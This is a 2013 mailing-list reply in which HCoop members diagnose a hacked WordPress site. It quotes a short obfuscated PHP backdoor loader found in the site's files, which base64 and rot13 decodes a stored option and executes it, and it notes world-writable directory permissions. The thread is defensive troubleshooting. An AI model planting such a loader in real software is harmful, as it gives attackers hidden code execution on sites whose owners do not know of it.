On May 17, 2013, at 10:39 PM, Clinton Ebadi <[email protected]> wrote:
> Yagnesh Raghava Yakkala <[email protected]> writes: > >> Hello all, >> >> My inbox is getting filled with mail delivery failure notices today (similar >> to the attached mail). It looks like it has something to do with akismet spam >> filter on my wordpress site (sapporoindians.com). I don't understand the >> problem. >> >> Any insights would great on: >> - how to know which program is initiating mail delivery >> - how to stop receiving failure notices to my inbox >> >> FYI, I haven't touched anything on my site for a long while now. > > Ack, Jesse is right -- your site has most definitely been hacked! > > This code is in a few files: > > $z=get_option("_site_transient_browser_fd2cad7aa8fab7055192469be2dc6c7d"); > $z=base64_decode(str_rot13($z)); if(strpos($z,"C260540C")!==false){ > $_z=create_function("",$z); @$_z(); } This looks a lot like the crack's signature as discussed in the wordpress forum entry I mentioned earlier: http://wordpress.org/support/topic/site-hacked-through-akismet > First, your wp-content directory is allowing ANYONE in the entire world > to write to it via afs... did you accidentally grant system:anyuser > write permissions when trying to do something else (I know the plugin > installer does not work unless your daemon user can writer to > wp-content)? > > Then there is the telltale chmod 777 (that does nothing, since we are > using afs). Again, other wordpress sites cracked with this exploit have had many permissions opened wide. Yagnesh, in addition to Clinton's always excellent advice I bet you'd find some good repair suggestions from other wordpress users on the wordpress forums. Heck, sites have been falling from this exploit for almost a year now, so there may be a pinned entry or a faq. Saporro huh? Way up north in Hokkaido. My brother spent a couple of years in Hokkaido. He said it was very cold, and this from someone who grew up and lives in the Rocky Mountains (Utah and Colorado). Best Regards, -- Jesse Shumway _______________________________________________ HCoop-Help mailing list [email protected] https://lists.hcoop.net/listinfo/hcoop-help
